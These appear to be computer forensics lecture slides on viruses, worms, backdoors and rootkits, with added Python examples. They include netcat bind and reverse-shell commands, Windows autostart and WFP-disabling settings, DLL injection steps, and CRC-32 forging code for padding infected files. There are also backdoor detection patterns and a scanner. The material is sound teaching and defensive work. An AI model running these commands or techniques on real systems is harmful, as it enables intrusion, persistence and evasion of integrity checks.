Viruses, Worms, Mobile Code
COEN 252: Computer Forensics
Viruses: The Principle
 A virus attaches itself to a host that can execute the instructions contained in the virus.
 When the host is invoked, the virus copies itself to other locations on the system.
Executables
Companion Infection Technique
 The OS calls the virus when the user requests the companion file.
 Windows:
   The virus is Notepad.com and hides behind Notepad.exe.
   The hidden attribute is set to prevent the virus from being seen.
   The virus launches the true Notepad.exe once it has run.
   If the user selects Start -> Run and types notepad, Windows starts the virus (notepad.com is found before notepad.exe in the search order).
Executables
Companion Infection Technique
 Windows:
   The virus renames Notepad.exe to Notepad.ex_ and hides it.
   The virus takes the place of Notepad.exe.
   Works with shortcuts.
   Used in the Trilisa virus / worm (2002).
Executables
Companion Infection Technique
 The virus uses the alternate data stream feature of NTFS:
   Streams look like one file in Explorer and in directory listings.
   The system activates the default stream, which is the virus.
   The virus then calls the alternate stream holding the original program.
   Win2KStream virus (2000).
Executables
Overwriting Technique
 The virus replaces part of an executable.
 Usually the executable loses functionality.
 Users will know that something is wrong.
Prepending Technique
 The virus is placed in front of the executable.
 After the virus executes, the host program is called.
 Very easy for .com files.
 Easy to clean files.
   The Bliss virus had a disinfect mode built into it.
 Used by the NIMDA worm.
Executables
Appending Infection Technique
 The virus inserts itself at the end of the host file.
 It adds a jump at the beginning of the host file.
Stealth Techniques for Prepending and Appending:
 Compress the host.
 When the virus calls the host, the host is uncompressed into RAM.
 Pad the total package (virus plus compressed host) to the same size as the original host.
 Choose the filler so that the checksum does not change.
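The filler trick only works against a linear checksum such as CRC-32; a cryptographic hash cannot be steered this way, which is why the integrity checkers discussed later use hashes. The following is an added example, not code from the lecture: it solves for the 4 filler bytes that make a prepended package (virus stub + compressed host + padding) carry the same CRC-32 as the clean host, then shows that SHA-256 still differs. The host bytes and the virus stub are constructed stand-ins; the forging routine itself is general (the same trick LRK's fix tool, mentioned later in these slides, uses to keep CRC checks happy).

```python
"""CRC-32 filler forging (added example, not from the lecture).

CRC-32 is a linear shift register, so any 4 bytes of filler can be solved
for to hit any CRC value. The host program and virus stub below are
constructed stand-ins; forge_crc32 is general.
"""
import hashlib
import random
import zlib

_POLY = 0xEDB88320  # reflected CRC-32 polynomial, the one zlib.crc32 uses

def _make_table():
    table = []
    for n in range(256):
        c = n
        for _ in range(8):
            c = (c >> 1) ^ _POLY if c & 1 else c >> 1
        table.append(c)
    return table

TABLE = _make_table()
# The top byte of TABLE[i] is a bijection of i; that property is what lets
# four bytes steer the register into any state.
REV = {entry >> 24: i for i, entry in enumerate(TABLE)}
assert len(REV) == 256

def _step(reg: int, byte: int) -> int:
    """One forward CRC-32 update of the 32-bit register."""
    return TABLE[(reg ^ byte) & 0xFF] ^ (reg >> 8)

def _unstep(reg_after: int, byte: int) -> int:
    """Inverse of _step: the register state before `byte` was processed."""
    idx = REV[reg_after >> 24]
    return (((reg_after ^ TABLE[idx]) << 8) & 0xFFFFFFFF) | ((idx ^ byte) & 0xFF)

def forge_crc32(data: bytes, pos: int, target: int) -> bytes:
    """Return `data` with the 4 bytes at `pos` replaced so zlib.crc32 == target."""
    if not 0 <= pos <= len(data) - 4:
        raise ValueError("need 4 bytes of filler inside data")
    prefix, suffix = data[:pos], data[pos + 4:]
    reg = zlib.crc32(prefix) ^ 0xFFFFFFFF       # register after the prefix
    want = target ^ 0xFFFFFFFF                   # register after all the data
    for b in reversed(suffix):                   # run the suffix backwards
        want = _unstep(want, b)
    # Four steps shift the old register out completely, so `want` depends
    # only on the four table indices used; peel them off via the top byte.
    r = want
    i3 = REV[r >> 24];           r ^= TABLE[i3]
    i2 = REV[(r >> 16) & 0xFF];  r ^= TABLE[i2] >> 8
    i1 = REV[(r >> 8) & 0xFF];   r ^= TABLE[i1] >> 16
    i0 = REV[r & 0xFF]
    patch = bytearray()
    for idx in (i0, i1, i2, i3):                 # replay from the prefix state
        byte = idx ^ (reg & 0xFF)
        patch.append(byte)
        reg = _step(reg, byte)
    assert reg == want
    return prefix + bytes(patch) + suffix

# Constructed sample host and the prepended package the slide describes:
# virus stub + compressed host + filler, padded back to the host's size.
HOST = b"MZ\x90\x00 original host program: prints hello and exits\n" * 4

def build_package(host: bytes) -> bytes:
    body = b"VIRUS-STUB:" + zlib.compress(host)
    filler = b"\x00" * max(4, len(host) - len(body))
    # Solve the first 4 filler bytes so the CRC equals the clean host's.
    return forge_crc32(body + filler, len(body), zlib.crc32(host))

def compare(host: bytes, package: bytes) -> dict:
    """CRC survives the trick; a cryptographic hash does not."""
    return {
        "crc_matches": zlib.crc32(host) == zlib.crc32(package),
        "sha256_matches": hashlib.sha256(host).digest()
        == hashlib.sha256(package).digest(),
    }

def selfcheck(trials: int = 50, seed: int = 1) -> bool:
    """Forge random data to random targets; True if every CRC comes out right."""
    rng = random.Random(seed)
    for _ in range(trials):
        data = bytes(rng.randrange(256) for _ in range(rng.randrange(4, 64)))
        pos = rng.randrange(0, len(data) - 3)
        target = rng.getrandbits(32)
        if zlib.crc32(forge_crc32(data, pos, target)) != target:
            return False
    return True

if __name__ == "__main__":
    pkg = build_package(HOST)
    print(len(HOST), len(pkg), compare(HOST, pkg), selfcheck())
```

Running it prints equal lengths, `crc_matches: True`, `sha256_matches: False`. The filler can sit anywhere in the file, not only at the end; the suffix is simply unwound backwards first.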
Boot Sector Modification
 Targets the Master Boot Record or a partition boot sector.
 Michelangelo virus (1991):
   Moves the original MBR boot strap code elsewhere on the disk.
   First the virus loads itself into memory, then it passes control to the original MBR boot code.
   Places itself into the boot sector of every floppy that is accessed.
   The memory-resident copy of the virus hooks the low-level BIOS disk services and gets called whenever these are executed.
   Can no longer spread under WinNT, Win2K or WinXP, which do not go through the BIOS for disk access; there it can only wreak havoc, e.g. by overwriting the sectors right after the partition boot sector.
Infection of Document Files
 Much software uses macros:
   MS Office, WordPerfect Office, StarOffice, OpenOffice, AutoCAD, Excel, ...
 MS Word runs macro code in event subroutines:
   Document_Open()
   Document_Close()
   AutoExec()
   ...
 A virus can copy itself to the victim's Normal.dot template.
   Normal.dot is processed whenever Word starts.
Other Targets
 Source code
 Scripts
   Visual Basic Scripts (.vbs) used by the OS, e.g. Startup.vbs, Exec.vbs
   Shell scripts, Perl scripts
 Java class files
   Platform-independent viruses
Propagation Techniques
 Removable storage
   Boot sector viruses, executable viruses
   Yamaha's CD-R drive firmware update contained the Chernobyl (CIH) virus.
 E-mail attachments
 Shared directories
Anti-Virus Defense
 Antivirus software on gateways and hosts:
   User workstations
   File servers
   Mail servers
   Application servers
   Border firewalls
   Handhelds
Anti-Virus Defense
 Virus signatures
   Look for small byte patterns indicative of a known virus.
   Defeated by polymorphic viruses.
 Heuristics
   Look for programs with bad behavior:
     Attempts to access the boot sector
     Attempts to locate all files in a directory
     Attempts to write to an .exe file
     Attempts to delete hard drive contents
     ...
Anti-Virus Defense
 Integrity verification
   Generate a database of hashes of important files.
   Recalculate these hashes and compare them to the known values.
 Configuration hardening
   Least privilege
   Minimize active components.
   Set warnings (e.g. against macros).
   User education
Anti-Anti-Virus Defense
 Stealthing
   Hide virus files.
   Intercept scanning of infected files.
   Slow the rate of infection.
   ...
 Polymorphism and metamorphism
   Change the order of instructions in the virus code.
   Use equivalent code (e.g. increment by 1 = subtract -1).
   Encrypt most of the virus body under a changing key.
   Slightly change the functionality of the virus as it spreads.
Anti-Anti-Virus Defense
 Antivirus software deactivation
   Kill processes known to be antivirus processes.
   Disable internet access to the antivirus vendor's pages.
   Change security settings (e.g. allow Word macros to run).
Worms
 Worm:
   Propagates across a network.
   Typically does not require user action for propagation.
 Virus:
   Infects files.
   Typically requires user interaction.
Worms
Worm Components
 Warhead
 Propagation engine
 Target selection algorithm
 Scanning engine
 Payload
Worm Warhead
 A piece of code that exploits a vulnerability on the target system:
   Buffer overflow exploits
   File sharing attacks
   E-mail
   Common misconfigurations
Worm Propagation Engine
 After gaining access, the worm must transfer itself to the target machine.
 Some worms are completely contained in the warhead.
 File transfer mechanisms:
   FTP
   TFTP
   HTTP
   SMB (MS Server Message Block)
     Windows file sharing
     Unix servers running Samba
Worm Target Selection Algorithm
 Once the worm has gained control of a target, it starts looking for new targets:
   E-mail addresses
   Host lists
   Trusted systems
   Network Neighborhood
   DNS queries
   Randomly selected IP addresses
Worm Scanning Engine
 Once candidate targets are identified, the worm scans them for the original vulnerability.
Worm Payload
 Some specific action done on behalf of the attacker:
   Opening up a backdoor.
   Planting a distributed denial of service agent.
   Performing complex calculations:
     password cracking
     math research (actually happened)
Worm Spread
 Worm spread is limited by:
   Diversity of machines
     A tiny worm that targeted only machines running security software from one medium-sized company was successful in infecting most of those machines.
     Worms can contain support for multiple entry methods.
   Too many victims crash.
   Fast worms cause network congestion.
Worm Trends
 Multiplatform worms
 Multiexploit worms
 Zero-day exploit worms
   No chance to patch
 Fast-spreading worms: Warhol / Flash
   Pre-scan targets
 Polymorphic worms
   Change appearance
 Metamorphic worms
   Change functionality
Worm Defenses
 Ethical (?) worms
 Antivirus tools
 Fast patching services
 Firewalling
   Block arbitrary outbound connections.
   Prevents spreading.
 Establishment of incident response capabilities
Malicious Mobile Code
Backdoors
 Backdoor: a program that allows attackers to bypass normal security controls on a system, gaining access to which they are not entitled.
Backdoor Types
 Local escalation of privilege
 Remote execution of individual commands
 Remote command-line access
 Remote control of the GUI
Backdoor Installation
 The attacker has compromised the system.
 A virus, worm, or malicious mobile code installs the backdoor.
 Social engineering: tricking the victim into installing the backdoor.
 ...
Starting Backdoors Automatically
 The attacker wants to maintain access to the system.
   The backdoor needs to restart whenever the system restarts.
   Methods are OS dependent.
Starting Backdoors Automatically on Windows
 Altering startup files and folders
 Registry
 Task Scheduler
Starting Backdoors Automatically on Windows
 Startup folders and files
   Autostart folders for individual users and for all users.
 Legacy startup files:
   win.ini
   system.ini
     Modify "shell=explorer.exe" on Win9x
   wininit
   winstart.bat (Win9x)
   Autoexec.bat (Win9x)
   Config.sys (Win9x)
Starting Backdoors Automatically on Windows
 Registry keys that start programs on login or reboot:
   HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\
     RunServicesOnce
     RunServices
     RunOnce
     Run
     RunOnceEx
   HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\
     RunServicesOnce
     RunServices
     RunOnce
     Run
     RunOnceEx
Starting Backdoors Automatically on Windows
 Registry keys that start programs on login or reboot:
   HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
   HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad
   HKLM\SOFTWARE\Policies\Microsoft\Windows\System\
     Scripts
     Explorer\Run
   HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
   HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad
   HKCU\SOFTWARE\Policies\Microsoft\Windows\System\
     Scripts
     Explorer\Run
Starting Backdoors Automatically on Windows
 A registry key that runs a program whenever an .exe is launched:
   HKCR\exefile\shell\open\command
     Names the program that will be run every time any .exe is run.
Starting Backdoors Automatically on Windows
 Use the Task Scheduler
   Check scheduled tasks (and all the locations above) with Autoruns from Sysinternals.
Starting Backdoors Automatically on Unix
 Modifying the init daemon configuration
 Modifying system and service initialization scripts
 Modifying the internet daemon configuration
 Changing user startup scripts
 Scheduling jobs with cron
Starting Backdoors Automatically on Unix
 Modify the init daemon configuration
   init is the first process to start.
   It uses /etc/inittab to find other processes that need to be started.
   The attacker merely adds a line to inittab.
Starting Backdoors Automatically on Unix
 Modify system and service initialization scripts
   About 20+ system scripts, located in /etc/rc.d or /etc/init.d.
   Or merely plant a backdoor in the initialization script for another service, e.g. the ppp daemon (for PPP modem dial-up connections).
   inetd, the network super-server daemon: change /etc/inetd.conf.
Starting Backdoors Automatically on Unix
 Adjust user startup scripts
   .login
   .cshrc
   /etc/profile
   .logout
   .xinitrc
   .xsession
Starting Backdoors Automatically on Unix
 Schedule jobs with cron
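The Unix autostart locations above are exactly what an investigator sweeps first. As an added example (not part of the lecture), here is a small scanner that walks those locations and flags lines that look like backdoor launchers: netcat-style listeners, shells bound to sockets, programs started from scratch directories, cron @reboot jobs. It works on an in-memory snapshot (relative path -> file text) so it runs offline; the snapshot below is constructed, and `snapshot_from_disk` shows how to build one from a mounted evidence image. The patterns are a starting point, not a complete list.

```python
"""Sweep Unix autostart locations for backdoor entries (added example).

The snapshot is a dict of relative path -> file contents, so the scan works
offline on constructed data or on files read from a mounted image.
"""
import os
import re
from typing import Dict, List, Tuple

# Locations the lecture lists; directories end with "/" and match prefixes.
LOCATIONS = [
    "etc/inittab", "etc/inetd.conf", "etc/profile",
    "etc/rc.d/", "etc/init.d/", "etc/crontab", "var/spool/cron/",
    ".login", ".cshrc", ".logout", ".xinitrc", ".xsession",
]

# Things a legitimate startup line rarely contains (first match wins).
SUSPICIOUS = [
    (re.compile(r"\bnc\b|\bnetcat\b|\bcryptcat\b"), "netcat-style listener"),
    (re.compile(r"-e\s*/bin/(ba)?sh|-e\s*cmd(\.exe)?"), "shell bound to a socket"),
    (re.compile(r"/dev/tcp/"), "bash reverse shell"),
    (re.compile(r"\b(sh|bash)\b.*\s-i\b"), "interactive shell spawned at startup"),
    (re.compile(r"/tmp/|/dev/shm/|/var/tmp/"), "program started from a scratch directory"),
    (re.compile(r"@reboot"), "cron @reboot job"),
]

def relevant(path: str) -> bool:
    """True if `path` (relative to the root) is one of the autostart locations."""
    base = os.path.basename(path)
    return any(path == loc or path.startswith(loc) or base == loc for loc in LOCATIONS)

def scan(snapshot: Dict[str, str]) -> List[Tuple[str, int, str, str]]:
    """Return (path, line number, reason, line) for every suspicious,
    non-comment line found in an autostart location of the snapshot."""
    findings = []
    for path, text in sorted(snapshot.items()):
        if not relevant(path):
            continue
        for lineno, line in enumerate(text.splitlines(), 1):
            stripped = line.strip()
            if not stripped or stripped.startswith("#"):
                continue
            for pattern, reason in SUSPICIOUS:
                if pattern.search(stripped):
                    findings.append((path, lineno, reason, stripped))
                    break
    return findings

def snapshot_from_disk(root: str) -> Dict[str, str]:
    """Read the autostart locations under `root` (e.g. a mounted image)."""
    snap = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root)
            if relevant(rel):
                try:
                    with open(full, errors="replace") as fh:
                        snap[rel] = fh.read()
                except OSError:
                    pass
    return snap

# Constructed sample: a host carrying the backdoors the lecture describes.
SAMPLE = {
    "etc/inittab": "id:3:initdefault:\n"
                   "l3:3:wait:/etc/rc.d/rc 3\n"
                   "bd:2345:respawn:/usr/bin/nc -l -p 2000 -e /bin/sh\n",
    "etc/inetd.conf": "ftp stream tcp nowait root /usr/sbin/tcpd in.ftpd\n"
                      "#telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd\n"
                      "ingreslock stream tcp nowait root /bin/sh sh -i\n",
    "etc/init.d/ppp": "#!/bin/sh\n/usr/sbin/pppd\n/tmp/.x/httpd &\n",
    "etc/crontab": "0 4 * * * root /usr/sbin/logrotate /etc/logrotate.conf\n"
                   "@reboot root /var/tmp/.cache/bd\n",
    "home/alice/.login": "setenv PATH /usr/bin:/bin\n",
    "home/alice/.cshrc": "alias ls ls -F\n",
    "etc/motd": "nc -l -p 1 -e /bin/sh written here is not a startup entry\n",
}

if __name__ == "__main__":
    for path, lineno, reason, line in scan(SAMPLE):
        print(f"{path}:{lineno}: {reason}: {line}")
```

On the sample it reports the inittab respawn line, the inetd ingreslock shell, the extra line in the ppp script and the @reboot cron job, and ignores the same text in /etc/motd because that file is not an autostart location.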
Backdoor Defenses
 System integrity tools like Tripwire
Backdoor with netcat
 netcat compiles into the executable nc.
 On the victim:
   nc -l -p 2000 -e cmd.exe (Windows)
   nc -l -p 2000 -e /bin/sh (Unix)
   Sets up a listener on port 2000 that hands each connection to a shell.
 On the attacker:
   nc [victim address] 2000
   gives a command shell.
Backdoor with netcat
 Only works if the attacker can establish a TCP connection to the port on the victim.
 Firewalls can block this.
Backdoor with netcat
 Use an open door in the firewall: shoveling a shell
 On the attacker's machine:
   nc -l -p 80
   netcat listener on port 80
 On the victim's machine:
   nc [attacker's address] 80 -e cmd.exe
   initiates an outgoing connection to the attacker, then executes a shell
Backdoor with netcat
 Alternatives to netcat:
   cryptcat
   Tini
   Q
   Bindshell
   Md5bd
   UDP_Shell
   TCPshell
   Crontabbackdoor
Virtual Network Computing
 Remote GUI tools:
   Virtual Network Computing (VNC)
   Windows Terminal Services
   Remote Desktop Service
   Citrix MetaFrame
   PCAnywhere
   Dameware
   Back Orifice 2000
   SubSeven
   www.megasecurity.org
Virtual Network Computing
 A VNC server allows shoveling a GUI session the same way a shell is shoveled.
 Can be remotely installed:
   The attacker has remote shell access on the victim.
   The attacker installs a copy of VNC on his own machine.
   The attacker exports the registry keys associated with VNC from his machine.
   The attacker moves four files to the victim.
   The attacker applies the registry changes on the victim.
     This displays a "VNC installation successful" message on the victim.
   The attacker starts VNC.
Defenses against Backdoor Shell Listeners
 Use firewalls
   Filter traffic in both directions.
   Firewall individual machines.
 Look for open ports
   On the network (Nmap)
   Or locally with a trusted tool (on CD).
 Close unneeded ports.
Backdoors without Ports
 ICMP backdoor
   ICMP messages don't use ports.
   Firewalls need to let some ICMP messages pass.
   ICMP messages can carry a few bytes of payload.
 ICMP backdoors:
   Loki
   007shell
   ICMP Tunnel
   available for free at www.packetstormsecurity.org
Non-Promiscuous Sniffing Backdoors
 A sniffer in non-promiscuous mode sniffs for commands in packets destined for the local machine.
Non-Promiscuous Sniffing Backdoors
 cd00r
   Sniffs for TCP SYN packets to ports X, Y, Z, in that order.
   The ports are not open, so a port scan shows nothing.
   Once the SYN sequence has been seen, the sniffer activates the backdoor.
   The backdoor opens a TCP port and shovels a shell.
     An open port can be detected.
     It is however unnecessary with a sniffer: "future releases" will discontinue this practice and just craft special packets instead.
   When the backdoor closes, the port is closed again.
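The trigger logic of a cd00r-style backdoor, and the defender's view of the same traffic, as an added example that is not cd00r's code. The packets are constructed tuples (source IP, destination port, SYN flag) of the kind a sniffer hands up; the knock ports and addresses are made up. Each source has to hit the ports in order, and a wrong knock resets its progress, so a port scanner that happens to touch all three ports never opens the door. The defender's side relies on the fact that SYNs to closed ports never complete a handshake (the host answers with RST), so a burst of them from one source stands out even though nothing is listening.

```python
"""cd00r-style port knock trigger plus the IDS-side view (added example).

Packets are constructed tuples as a sniffer would deliver them; nothing is
captured from a real interface.
"""
from collections import defaultdict
from typing import Iterable, List, Tuple

Packet = Tuple[str, int, bool]   # (source IP, destination port, SYN flag)

class KnockTrigger:
    """cd00r logic: only SYNs to `ports`, in order, from one source open the
    door. Any wrong knock resets that source's progress."""
    def __init__(self, ports: List[int]):
        self.ports = ports
        self.progress = defaultdict(int)     # source -> knocks matched so far
        self.opened_for: List[str] = []

    def observe(self, pkt: Packet) -> bool:
        """Feed one packet; True when the sequence completes for its source."""
        src, port, syn = pkt
        if not syn:
            return False
        if port == self.ports[self.progress[src]]:
            self.progress[src] += 1
        elif port == self.ports[0]:
            self.progress[src] = 1           # wrong knock, but a fresh first one
        else:
            self.progress[src] = 0
        if self.progress[src] == len(self.ports):
            self.progress[src] = 0
            self.opened_for.append(src)      # here cd00r would bind its shell port
            return True
        return False

def closed_port_syn_bursts(packets: Iterable[Packet], open_ports: frozenset,
                           threshold: int = 3) -> List[str]:
    """Sources that sent at least `threshold` SYNs to ports nothing listens on."""
    counts = defaultdict(int)
    for src, port, syn in packets:
        if syn and port not in open_ports:
            counts[src] += 1
    return sorted(src for src, n in counts.items() if n >= threshold)

# Constructed traffic: the attacker knocks 6080, 6081, 6082 in order; a
# scanner hits the same closed ports out of order; a client talks to port 80.
TRAFFIC: List[Packet] = [
    ("10.0.0.5", 80, True),
    ("198.51.100.7", 6080, True),
    ("198.51.100.7", 6081, True),
    ("203.0.113.9", 6082, True),    # scanner: wrong order, never triggers
    ("203.0.113.9", 6081, True),
    ("203.0.113.9", 6080, True),
    ("198.51.100.7", 6082, True),   # third knock: door opens for the attacker
    ("10.0.0.5", 80, False),
]

def run(traffic=TRAFFIC, ports=(6080, 6081, 6082), open_ports=frozenset({80})):
    """Return (sources the backdoor opened for, sources an IDS would flag)."""
    trigger = KnockTrigger(list(ports))
    for pkt in traffic:
        trigger.observe(pkt)
    return trigger.opened_for, closed_port_syn_bursts(traffic, open_ports)

if __name__ == "__main__":
    print(run())
```

Note the asymmetry the slide points at: the IDS cannot tell the attacker's knocks from the scanner's (both show up as SYN bursts to closed ports), which is why the follow-up open port, or the packet counts, are what an investigator looks for.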
Promiscuous Sniffing Backdoors
 A promiscuous sniffer can gather packets sent to any machine on the same LAN segment.
   The IP address of suspicious traffic does not have to be that of the victim machine.
Promiscuous Sniffing Backdoors
 Scenario: the attacker has compromised the DNS server and installed a promiscuous sniffing backdoor there.
 The attacker sends a packet to the web server at port 80.
   The message passes through the firewall ("message to web server, let pass").
 The sniffer on the DNS server sniffs the packet.
   The web server does not know what to do with the malformed request and drops it.
 The backdoor on the DNS server reacts to the packet.
   It sends a message back to the attacker with the return address spoofed to be the web server's.
   The firewall lets it pass ("message from web server, let pass").
Defenses against backdoors
without ports



Backdoors still create running
processes.
Backdoors still create network packets.
Backdoors might put MAC cards into
promiscuous mode.
Trojan Horses
a program with added functionality.
Trojan Horses
 Hiding names
   Change the name (of netcat, VNC, ...).
   Play with Windows suffixes:
     "just_text.txt                                 .exe"
       This is ONE file name with a bunch of spaces in it; Explorer shows only the leading part.
     Use the .shs suffix (shell scrap object): Windows suppresses this suffix in its display, so "just_text.txt.shs" is shown as "just_text.txt".
   Windows uses the suffix to decide what to do with a file.
Trojan Horses
 Hiding names
   Take someone else's name.
     Overeager system administrators might even remove the legitimate program, thinking it might be the fake program.
     Windows does not let you kill processes with certain names, regardless of content: csrss.exe, services.exe, smss.exe, System, System Idle Process, winlogon.exe.
     There might be more than one legitimate process named winlogon.exe or csrss.exe, so an extra one does not stand out.
   Use common typos of important files for a Trojan, e.g. ifconfig instead of ipconfig.
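The naming tricks above are cheap to check for mechanically once you have a raw listing (one that shows trailing spaces and the real extension, as a forensic tool does, rather than what Explorer displays). Added example, not from the lecture: a triage function that flags runs of spaces before an executable extension, suffixes Explorer suppresses, document-looking double extensions, protected process names outside the system directory, and look-alikes of those names such as csrcc.exe. The sample paths are constructed; the lists of protected names and hidden suffixes are deliberately short and meant to be extended.

```python
"""Flag file names that use the Trojan hiding tricks on the slides (added
example). Input paths are raw, as a forensic listing shows them.
"""
import re
from typing import List, Tuple

DANGEROUS_EXT = {".exe", ".com", ".scr", ".pif", ".bat", ".cmd", ".vbs", ".shs"}
SUPPRESSED_EXT = {".shs", ".lnk", ".pif"}        # Explorer hides these suffixes
DOCUMENT_EXT = {".txt", ".doc", ".jpg", ".pdf"}
PROTECTED_NAMES = ["csrss.exe", "services.exe", "smss.exe", "winlogon.exe",
                   "lsass.exe", "svchost.exe"]
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\winnt\\system32\\")

def _ext(name: str) -> str:
    dot = name.rfind(".")
    return name[dot:].lower() if dot >= 0 else ""

def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance, used to catch look-alikes such as csrcc.exe."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def check_name(path: str) -> List[str]:
    """Reasons why the file at `path` (full Windows path) looks disguised."""
    reasons = []
    name = path.rsplit("\\", 1)[-1]
    ext = _ext(name)
    stem = name[: len(name) - len(ext)] if ext else name
    if ext in DANGEROUS_EXT and re.search(r"\s{2,}", stem):
        reasons.append("runs of spaces push the real extension out of view")
    if ext in SUPPRESSED_EXT:
        reasons.append(f"{ext} suffix is not displayed by Explorer")
    if ext in DANGEROUS_EXT and _ext(stem.rstrip()) in DOCUMENT_EXT:
        reasons.append("double extension: looks like a document")
    low = name.lower()
    in_sysdir = path.lower().startswith(SYSTEM_DIRS)
    if low in PROTECTED_NAMES:
        if not in_sysdir:
            reasons.append("system process name outside the system directory")
    else:
        for real in PROTECTED_NAMES:
            if ext == _ext(real) and edit_distance(low, real) <= 2:
                reasons.append(f"look-alike of {real}")
                break
    return reasons

# Constructed sample listing.
SAMPLE = [
    "C:\\Temp\\just_text.txt                                        .exe",
    "C:\\Temp\\just_text.txt.shs",
    "C:\\Temp\\photo.jpg.exe",
    "C:\\WINDOWS\\csrcc.exe",
    "C:\\WINDOWS\\system32\\csrss.exe",
    "C:\\Documents and Settings\\alice\\winlogon.exe",
    "C:\\WINDOWS\\system32\\notepad.exe",
    "C:\\Temp\\readme.txt",
]

def triage(paths=SAMPLE) -> List[Tuple[str, List[str]]]:
    """(path, reasons) for every path that triggers at least one rule."""
    out = []
    for p in paths:
        reasons = check_name(p)
        if reasons:
            out.append((p, reasons))
    return out

if __name__ == "__main__":
    for p, reasons in triage():
        print(repr(p), "->", "; ".join(reasons))
```

The genuine csrss.exe in system32 and notepad.exe produce no finding; the copy of winlogon.exe in a user profile and csrcc.exe do, which is the case the slide warns an overeager administrator might get backwards.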
Trojan Horse Defenses
 Pskill will kill any horse / process.
 Fport and lsof will find the open ports associated with the horse.
 Tripwire can find substituted executables.
 Filter email attachments that are executable.
Wrappers
 Wrap malware in a good program.
   A.k.a. binders, packers, exe binders, exe joiners.
   AFX File Lace, Elite Wrap, Exe2vbs, PE Bundle, Perl2Exe, Saran Wrap, TOPV4, Trojan Man
 Combat with:
   Anti-virus software
   File system integrity checkers (Tripwire)
   Posted MD5, SHA1 values of downloads
Rootkits
 Definition: rootkits are Trojan horse backdoor tools that modify existing operating system software so that an attacker can keep access to and hide on a machine.
Unix User Mode Rootkits
 Rootkits are bundled packages consisting of:
   Binary replacements that provide backdoor access.
   Binary replacements that hide the attacker.
   Other tools for hiding.
   Additional odds and ends.
   Installation script.
Unix User Mode Rootkits: LRK
 Around since the early nineties.
 Version 6 is appearing.
Unix User Mode Rootkits: LRK
 Backdoor access:
   Trojaned login, rshd, sshd
     Same functionality, but with a special backdoor password ("rewt") that gives root access.
   Altered inetd, tcpd
     Remote shell on a chosen port.
   Local privilege escalation backdoors: chfn, chsh, passwd, su
Unix User Mode Rootkits: LRK
 Binary replacements that hide the attacker:
   Processes: ps, top, pidof, killall, crontab
   Network use: netstat, ifconfig
   Files: ls, find, du (omits the space taken by hidden files)
   Events: syslogd
Unix User Mode Rootkits: LRK
 Other tools for hiding:
   fix
     Resets the MAC times of trojaned system files.
     Pads files so that the CRC check matches the one of the original files.
   zap2 and similar utmp/wtmp editors
     Blank out / edit information in important files:
       utmp, wtmp: store data on users currently / ever logged in.
       btmp: stores data on bad logins.
       lastlog: stores data on the last login for each user.
Unix User Mode Rootkits: LRK
 Goodies
   bindshell
     Creates a backdoor listener.
     The attacker connects with netcat to the listener.
   sniffer
     linsniffer grabs IDs and passwords for ftp, telnet.
Unix User Mode Rootkits: LRK
 LRK installation script
   The makefile allows choosing the configuration.
   No need to understand any of the workings of LRK.
   Installs in seconds / a few minutes.
Unix User Mode Rootkits: URK
 Universal Root Kit
   Functions on a variety of Unix variants.
   Has slightly less functionality than LRK.
Ext2fs Manipulations
 runefs and the Defiler's Toolkit foil computer forensics investigations on a Unix machine.
 runefs
   Adds pointers to good blocks to the bad blocks inode.
   Stores data in those blocks.
   The Coroner's Toolkit and its derivatives don't look at these blocks.
Ext2fs Manipulations
 The Defiler's Toolkit destroys data that a forensics tool can harvest.
   shred and other overwrite tools destroy the data in a block.
   The Defiler's Toolkit destroys inode and directory information as well.
     Necrofile scrubs inodes clean.
     Klismafile overwrites directory entries associated with deleted files.
       This leaves blank spots in a directory.
       This shows that someone used Klismafile.
Windows User Mode Rootkits
 Windows File Protection (WFP)
   Scans for changes to critical executables and libraries.
     Compares the digital signatures of about 1700 files against protected catalogs.
   If WFP detects a change, it searches for an authorized copy of the file in different locations (the dllcache, the installation media).
   Only these mechanisms are allowed to alter protected files:
     Windows Service Pack installations (Update.exe)
     Hotfix distributions (Hotfix.exe)
     Windows Update feature
     Windows Device Installer
Windows User Mode Rootkits
 Implementing user mode rootkits in Windows:
   Use existing interfaces.
   Overwrite files.
   Use DLL injection and API hooking to manipulate running processes in memory.
Windows User Mode Rootkits
 Use existing interfaces: FakeGINA
   Sits between winlogon and msgina.
   Windows uses the Graphical Identification aNd Authentication (GINA) DLL for logon.
   Windows ships with a default GINA (msgina.dll) and allows system administrators to install third-party GINA DLLs.
   The attacker sets the GinaDLL value under the registry key
     HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
   to install FakeGINA.
   FakeGINA gathers passwords, then passes the logon credentials on to the real msgina.dll.
Windows User Mode Rootkits
 Changing WFP settings
   WFP configuration is stored in the registry.
   The attacker can change a system file and then:
   1. Delete the version in the dllcache.
      WFP cannot find a correct version and sends a message requesting the system CD.
      The administrator might ignore the message.
   2. Alter the location of the dllcache by modifying the registry.
      WFP checks signatures and finds many mismatches; the log fills with warnings.
   3. Turn off WFP by changing a registry key.
      WFP stays active until reboot; a warning message appears after the reboot.
   4. Set the SFCDisable key to the value 0xFFFFFF9D.
      Completely disables WFP on Win2000.
      No warning dialog, only a log message that WFP is inactive.
      Code Red II used method 4.
Windows User Mode Rootkits
 DLL injection
   Forces an .exe process to accept a DLL it never requested:
     Allocate space in the victim process for the name of the DLL and any parameters. (VirtualAllocEx)
     Write the name into the memory space of the victim process. (WriteProcessMemory)
     Create a thread in the victim process that loads the DLL by that name. (CreateRemoteThread with LoadLibrary as the start routine)
     Free up the resources in the victim process after execution is complete.
Windows User Mode Rootkits
 DLL injection allows hijacking any process.
